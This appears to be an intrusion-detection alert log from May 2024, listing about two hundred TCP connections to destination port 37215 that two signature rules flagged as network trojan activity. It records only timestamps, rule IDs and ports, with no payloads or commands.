            Timestamp:05/28/24-09:57:38.305458
            SID:2829579
            Source Port:40492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.959865
            SID:2835222
            Source Port:32956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.803936
            SID:2829579
            Source Port:38392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.467346
            SID:2829579
            Source Port:55942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924247
            SID:2829579
            Source Port:50624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916325
            SID:2829579
            Source Port:55262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.843785
            SID:2829579
            Source Port:52404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.053825
            SID:2829579
            Source Port:38270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450777
            SID:2829579
            Source Port:51912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842720
            SID:2835222
            Source Port:45650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069455
            SID:2829579
            Source Port:45784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.454095
            SID:2829579
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559325
            SID:2829579
            Source Port:35634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000413
            SID:2829579
            Source Port:34798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870650
            SID:2835222
            Source Port:44866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760218
            SID:2829579
            Source Port:38058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.670918
            SID:2835222
            Source Port:53096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777918
            SID:2829579
            Source Port:55598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.063911
            SID:2835222
            Source Port:38662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.486744
            SID:2835222
            Source Port:48588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.910502
            SID:2835222
            Source Port:45092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996283
            SID:2835222
            Source Port:51144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771595
            SID:2829579
            Source Port:40692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923416
            SID:2829579
            Source Port:39238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344250
            SID:2835222
            Source Port:33780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.309149
            SID:2835222
            Source Port:45648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923036
            SID:2829579
            Source Port:51534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.422908
            SID:2829579
            Source Port:49470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940233
            SID:2835222
            Source Port:39858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661762
            SID:2835222
            Source Port:51318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877548
            SID:2829579
            Source Port:52210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052809
            SID:2829579
            Source Port:43152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004745
            SID:2835222
            Source Port:43626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077807
            SID:2835222
            Source Port:40684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963565
            SID:2835222
            Source Port:38252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990659
            SID:2829579
            Source Port:41152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.745965
            SID:2835222
            Source Port:59178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920283
            SID:2829579
            Source Port:42050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543266
            SID:2835222
            Source Port:57626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811012
            SID:2829579
            Source Port:52958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.749795
            SID:2835222
            Source Port:51176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.922941
            SID:2835222
            Source Port:60556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341186
            SID:2829579
            Source Port:53028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804435
            SID:2829579
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894076
            SID:2835222
            Source Port:53328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001077
            SID:2835222
            Source Port:36620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303542
            SID:2829579
            Source Port:58734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936195
            SID:2835222
            Source Port:50394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.918860
            SID:2829579
            Source Port:50928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822013
            SID:2829579
            Source Port:42036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832221
            SID:2835222
            Source Port:37980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.331343
            SID:2829579
            Source Port:40640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.749948
            SID:2835222
            Source Port:33850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952559
            SID:2835222
            Source Port:39874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847425
            SID:2829579
            Source Port:52570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851036
            SID:2835222
            Source Port:43776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.612127
            SID:2829579
            Source Port:57172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721095
            SID:2835222
            Source Port:46278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.682268
            SID:2835222
            Source Port:60012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675814
            SID:2829579
            Source Port:44132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.990729
            SID:2835222
            Source Port:36708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423616
            SID:2835222
            Source Port:45198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.372669
            SID:2829579
            Source Port:39536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756063
            SID:2829579
            Source Port:43238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309078
            SID:2835222
            Source Port:42688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808038
            SID:2829579
            Source Port:58820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810723
            SID:2829579
            Source Port:37806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026939
            SID:2835222
            Source Port:41532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.973799
            SID:2829579
            Source Port:58350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.250960
            SID:2829579
            Source Port:60056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251321
            SID:2829579
            Source Port:53938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896096
            SID:2829579
            Source Port:41082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519838
            SID:2829579
            Source Port:37236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.842584
            SID:2835222
            Source Port:38030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.011056
            SID:2829579
            Source Port:60262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809616
            SID:2835222
            Source Port:54388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434397
            SID:2835222
            Source Port:51642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597284
            SID:2835222
            Source Port:50644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760063
            SID:2829579
            Source Port:54058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313048
            SID:2829579
            Source Port:54110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746019
            SID:2829579
            Source Port:50414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934116
            SID:2835222
            Source Port:36982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745056
            SID:2835222
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326778
            SID:2835222
            Source Port:49526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064799
            SID:2829579
            Source Port:57126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605266
            SID:2835222
            Source Port:40622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853866
            SID:2829579
            Source Port:45436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612074
            SID:2829579
            Source Port:57946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777046
            SID:2829579
            Source Port:60700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506698
            SID:2835222
            Source Port:53654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734366
            SID:2829579
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045430
            SID:2835222
            Source Port:48240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657318
            SID:2835222
            Source Port:35834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058568
            SID:2829579
            Source Port:34376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918978
            SID:2829579
            Source Port:35644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290963
            SID:2835222
            Source Port:55348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020486
            SID:2829579
            Source Port:48034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866964
            SID:2835222
            Source Port:39624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757599
            SID:2829579
            Source Port:38636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.796061
            SID:2835222
            Source Port:32840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681848
            SID:2835222
            Source Port:45758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899738
            SID:2835222
            Source Port:47458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739076
            SID:2835222
            Source Port:33042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.419491
            SID:2835222
            Source Port:45526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180437
            SID:2835222
            Source Port:57448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573059
            SID:2829579
            Source Port:37094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.859710
            SID:2829579
            Source Port:50318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857704
            SID:2829579
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.035294
            SID:2829579
            Source Port:48948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.358591
            SID:2829579
            Source Port:43826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.426806
            SID:2829579
            Source Port:60696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.040961
            SID:2829579
            Source Port:50894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316890
            SID:2835222
            Source Port:50012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775605
            SID:2829579
            Source Port:58560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841848
            SID:2835222
            Source Port:37082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713054
            SID:2829579
            Source Port:39450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.860581
            SID:2829579
            Source Port:56784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289364
            SID:2835222
            Source Port:38552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866243
            SID:2829579
            Source Port:47278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604504
            SID:2835222
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748523
            SID:2835222
            Source Port:52064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736376
            SID:2829579
            Source Port:54116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873224
            SID:2829579
            Source Port:54768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065950
            SID:2829579
            Source Port:36616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.712100
            SID:2829579
            Source Port:35852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922261
            SID:2835222
            Source Port:34676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279485
            SID:2835222
            Source Port:47848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841511
            SID:2835222
            Source Port:43028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471531
            SID:2835222
            Source Port:54280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371550
            SID:2829579
            Source Port:50858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861137
            SID:2829579
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842673
            SID:2835222
            Source Port:40920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842907
            SID:2829579
            Source Port:36456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870245
            SID:2829579
            Source Port:32846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786648
            SID:2829579
            Source Port:53808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581889
            SID:2835222
            Source Port:34346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326736
            SID:2829579
            Source Port:34560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852708
            SID:2835222
            Source Port:47266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491286
            SID:2829579
            Source Port:44272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473864
            SID:2829579
            Source Port:38502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444693
            SID:2829579
            Source Port:33538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955863
            SID:2835222
            Source Port:45428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584047
            SID:2829579
            Source Port:55782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730687
            SID:2829579
            Source Port:44548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.911064
            SID:2835222
            Source Port:51050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871368
            SID:2835222
            Source Port:48352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.903997
            SID:2829579
            Source Port:43650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808494
            SID:2835222
            Source Port:50982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.408498
            SID:2835222
            Source Port:34334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842781
            SID:2835222
            Source Port:33308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857595
            SID:2835222
            Source Port:37220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922144
            SID:2829579
            Source Port:41492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716697
            SID:2829579
            Source Port:55750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922729
            SID:2829579
            Source Port:41408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848926
            SID:2829579
            Source Port:41528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543392
            SID:2835222
            Source Port:45130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.705013
            SID:2835222
            Source Port:53718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433513
            SID:2829579
            Source Port:51788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398495
            SID:2835222
            Source Port:41910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.820253
            SID:2829579
            Source Port:37386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444944
            SID:2835222
            Source Port:43044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027058
            SID:2835222
            Source Port:41016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.014810
            SID:2829579
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918796
            SID:2835222
            Source Port:55588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941654
            SID:2835222
            Source Port:58694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887912
            SID:2829579
            Source Port:52348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.005748
            SID:2829579
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605135
            SID:2835222
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.574243
            SID:2829579
            Source Port:59610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804981
            SID:2829579
            Source Port:56540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818550
            SID:2835222
            Source Port:54152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731544
            SID:2829579
            Source Port:36536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107825
            SID:2835222
            Source Port:44948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951218
            SID:2829579
            Source Port:59786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052481
            SID:2829579
            Source Port:48214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746824
            SID:2835222
            Source Port:56730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863798
            SID:2835222
            Source Port:47918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843262
            SID:2835222
            Source Port:42486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622419
            SID:2829579
            Source Port:55598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847058
            SID:2835222
            Source Port:37266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563467
            SID:2829579
            Source Port:59334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020605
            SID:2835222
            Source Port:60214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320247
            SID:2829579
            Source Port:52804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767486
            SID:2835222
            Source Port:58812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916427
            SID:2835222
            Source Port:58388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854692
            SID:2835222
            Source Port:49420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291024
            SID:2829579
            Source Port:39388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358212
            SID:2829579
            Source Port:57966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988610
            SID:2835222
            Source Port:33308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.475590
            SID:2835222
            Source Port:36322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052932
            SID:2835222
            Source Port:34260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986078
            SID:2829579
            Source Port:42840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893094
            SID:2829579
            Source Port:53826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818382
            SID:2829579
            Source Port:37286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862733
            SID:2835222
            Source Port:41856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180571
            SID:2835222
            Source Port:55558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909231
            SID:2829579
            Source Port:44080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544295
